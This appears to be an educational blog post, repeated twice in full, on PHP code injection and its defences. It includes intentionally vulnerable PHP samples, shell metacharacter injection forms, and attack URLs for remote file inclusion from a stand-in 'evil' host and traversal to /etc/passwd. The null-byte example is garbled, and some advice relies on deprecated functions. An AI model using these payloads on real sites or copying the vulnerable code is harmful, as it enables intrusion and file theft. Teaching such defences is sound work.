SQL injection
SQL injection is a technique for injecting code in a data-driven application. In this technique, malicious SQL statements are entered into an input field for execution. It exploits the security of application software. It is commonly and mostly used for attacking the application layer. After being successful, a hacker will get a clear channel to communicate with the database.
Suppose we are filling a form and one of the input fields are not properly validated. If a hacker injects some other malicious SQL command that will provide extra information from the database, it will ultimately provide a clear channel for communication with the database.
Shell Injection
Shell Injection is an attack that allows a PHP script to programmatically execute a command line. Consider the following short PHP program, which runs an external program called funny text to replace a word the user sent with some other word:
<?php
passthru("/home/user/php/funnytext ". $_GET['USER_INPUT'] );
?>
This program can be injected in multiple ways:
'command' will execute command.
$(command) will execute command.
; command will execute command, and output result of command.
| command will execute the command.
&& command will execute the command, and output the result of the command.
|| command will execute the command, and output the result of the command.
> /home/user/php/.bashrc will overwrite the file .bashrc.
< /home/user/php/.bashrc will send the file .bashrc as input to funnytext.
PHP offers escapeshellarg() and escapeshellcmd() to perform encoding before calling methods.
Ways to prevent code injection attacks
The ways to prevent code injection attacks are as follows:
Perform input validation.
Escape dangerous characters. For instance, in PHP, using the htmlentities() function to protect general inputs into the Web application, and mysql_real_escape_string() to protect inputs, which will be included in a SQL request, to protect against SQL Injection.
Perform input encoding.
Perform output encoding.
Perform modular shell disassociation from kernel.
Remote File Inclusion
Remote File Inclusion is a vulnerability that is most often found on Web sites. It permits an attacker for including a remote file on a web server in the form of a script. The vulnerability takes place because of the usage of the data supplied by the user without any proper validation. This can cause the following:
Execution of code on client-system via JavaScript that can lead to attacks such as cross-site scripting.
Execution of code on the web server.
Denial of Service (DoS)
Data Theft or Manipulation
In PHP, it can be easily caused due to the continuous usage of external variables such as $_POST, $_GET, $_COOKIE, etc. with a file system method, more often due to the statements like include and require. The vulnerabilities are mainly contributed due to new developers, who are not as such familiar with the capabilities of the PHP programming language. In PHP, there is a directive, known as allow_url_fopen, which, when enabled, allows file system functions to use a URL and allow them to query data from remote locations. An attacker can alter a variable that is passed to one of these functions, and in return cause the inclusion of malicious code from a remote resource. Therefore, for protection, every user input should be validated before being used.
Example
Consider the following code:
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
For the PHP script given above, the following HTML code needs to be submitted:
<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
The developer developed the code with an intension that only blue.php and red.php should be used as options. However, any arbitrary value can be easily inserted in COLOR; it is possible to inject code from files:
/vulnerable.php?COLOR=http://evil/exploit? - It can inject a remotely hosted file that contains an exploit.
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - It can execute code from an already uploaded file with the name exploit.php.
/vulnerable.php?COLOR=../../../../../../../../etc/passwd - It permits an attacker to read the contents of the passwd file on a UNIX system directory traversal.
Command injection attack
A command injection attack is used to inject and execute commands specified by the attacker in a vulnerable application. The application, which executes unwanted system commands, is like a virtual system shell. The attacker may use it as any authorized system user. However, commands are executed with the same privileges and environment as the application has. Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker.
Include file injection attack
In the include file injection attack, a malicious user injects a remotely hosted file containing an exploit. Consider this PHP program (which includes a file specified by request):
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
The developer thought this would ensure that only blue.php and red.php could be loaded. However, as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:
/vulnerable.php?COLOR=http://evil/exploit? - Injects a remotely hosted file containing an exploit.
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php.
/vulnerable.php?COLOR=../../../../../../../../etc/passwd - Allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.
/vulnerable.php?COLOR=C:\\notes.txt - Uses NULL meta character to remove the .php suffix, allowing access to files other than .php. (PHP setting "magic_quotes_gpc = On" would stop this attack)
escapeshellcmd() function
The escapeshellcmd() function escapes all of the shell metacharacters and control operators within a string. It decreases the risks involved in allowing user input to be passed to the shell, by escaping all metacharacters and control operators with backslashes. Hence, it is used to overcome command injection attacks.
escapeshellarg() function
The escapeshellarg() function is used to convert a scalar value into a single-quote delimited string that can be used safely as a single argument for a shell command. It converts the existing single quotes (') value to the '\''. In this way, this sequence temporarily ends the single-quoted string and inserts a literal single quote, and then resumes the string. Since the data passed through escapeshellarg() can safely be used as a single argument, it can be used to mitigate the command injection attack.
mysqli_real_escape_string
The mysqli_real_escape_string is used to escape the special characters in a string for use in an SQL statement, taking into account the current charset of the connection.
SQL injection is a technique for injecting code in a data-driven application. In this technique, malicious SQL statements are entered into an input field for execution. It exploits the security of application software. It is commonly and mostly used for attacking the application layer. After being successful, a hacker will get a clear channel to communicate with the database.
Suppose we are filling a form and one of the input fields are not properly validated. If a hacker injects some other malicious SQL command that will provide extra information from the database, it will ultimately provide a clear channel for communication with the database.
Shell Injection
Shell Injection is an attack that allows a PHP script to programmatically execute a command line. Consider the following short PHP program, which runs an external program called funny text to replace a word the user sent with some other word:
<?php
passthru("/home/user/php/funnytext ". $_GET['USER_INPUT'] );
?>
This program can be injected in multiple ways:
'command' will execute command.
$(command) will execute command.
; command will execute command, and output result of command.
| command will execute the command.
&& command will execute the command, and output the result of the command.
|| command will execute the command, and output the result of the command.
> /home/user/php/.bashrc will overwrite the file .bashrc.
< /home/user/php/.bashrc will send the file .bashrc as input to funnytext.
PHP offers escapeshellarg() and escapeshellcmd() to perform encoding before calling methods.
Ways to prevent code injection attacks
The ways to prevent code injection attacks are as follows:
Perform input validation.
Escape dangerous characters. For instance, in PHP, using the htmlentities() function to protect general inputs into the Web application, and mysql_real_escape_string() to protect inputs, which will be included in a SQL request, to protect against SQL Injection.
Perform input encoding.
Perform output encoding.
Perform modular shell disassociation from kernel.
Remote File Inclusion
Remote File Inclusion is a vulnerability that is most often found on Web sites. It permits an attacker for including a remote file on a web server in the form of a script. The vulnerability takes place because of the usage of the data supplied by the user without any proper validation. This can cause the following:
Execution of code on client-system via JavaScript that can lead to attacks such as cross-site scripting.
Execution of code on the web server.
Denial of Service (DoS)
Data Theft or Manipulation
In PHP, it can be easily caused due to the continuous usage of external variables such as $_POST, $_GET, $_COOKIE, etc. with a file system method, more often due to the statements like include and require. The vulnerabilities are mainly contributed due to new developers, who are not as such familiar with the capabilities of the PHP programming language. In PHP, there is a directive, known as allow_url_fopen, which, when enabled, allows file system functions to use a URL and allow them to query data from remote locations. An attacker can alter a variable that is passed to one of these functions, and in return cause the inclusion of malicious code from a remote resource. Therefore, for protection, every user input should be validated before being used.
Example
Consider the following code:
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
For the PHP script given above, the following HTML code needs to be submitted:
<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
The developer developed the code with an intension that only blue.php and red.php should be used as options. However, any arbitrary value can be easily inserted in COLOR; it is possible to inject code from files:
/vulnerable.php?COLOR=http://evil/exploit? - It can inject a remotely hosted file that contains an exploit.
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - It can execute code from an already uploaded file with the name exploit.php.
/vulnerable.php?COLOR=../../../../../../../../etc/passwd - It permits an attacker to read the contents of the passwd file on a UNIX system directory traversal.
Command injection attack
A command injection attack is used to inject and execute commands specified by the attacker in a vulnerable application. The application, which executes unwanted system commands, is like a virtual system shell. The attacker may use it as any authorized system user. However, commands are executed with the same privileges and environment as the application has. Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker.
Include file injection attack
In the include file injection attack, a malicious user injects a remotely hosted file containing an exploit. Consider this PHP program (which includes a file specified by request):
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
The developer thought this would ensure that only blue.php and red.php could be loaded. However, as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:
/vulnerable.php?COLOR=http://evil/exploit? - Injects a remotely hosted file containing an exploit.
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php.
/vulnerable.php?COLOR=../../../../../../../../etc/passwd - Allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.
/vulnerable.php?COLOR=C:\\notes.txt - Uses NULL meta character to remove the .php suffix, allowing access to files other than .php. (PHP setting "magic_quotes_gpc = On" would stop this attack)
escapeshellcmd() function
The escapeshellcmd() function escapes all of the shell metacharacters and control operators within a string. It decreases the risks involved in allowing user input to be passed to the shell, by escaping all metacharacters and control operators with backslashes. Hence, it is used to overcome command injection attacks.
escapeshellarg() function
The escapeshellarg() function is used to convert a scalar value into a single-quote delimited string that can be used safely as a single argument for a shell command. It converts the existing single quotes (') value to the '\''. In this way, this sequence temporarily ends the single-quoted string and inserts a literal single quote, and then resumes the string. Since the data passed through escapeshellarg() can safely be used as a single argument, it can be used to mitigate the command injection attack.
mysqli_real_escape_string
The mysqli_real_escape_string is used to escape the special characters in a string for use in an SQL statement, taking into account the current charset of the connection.
No comments:
Post a Comment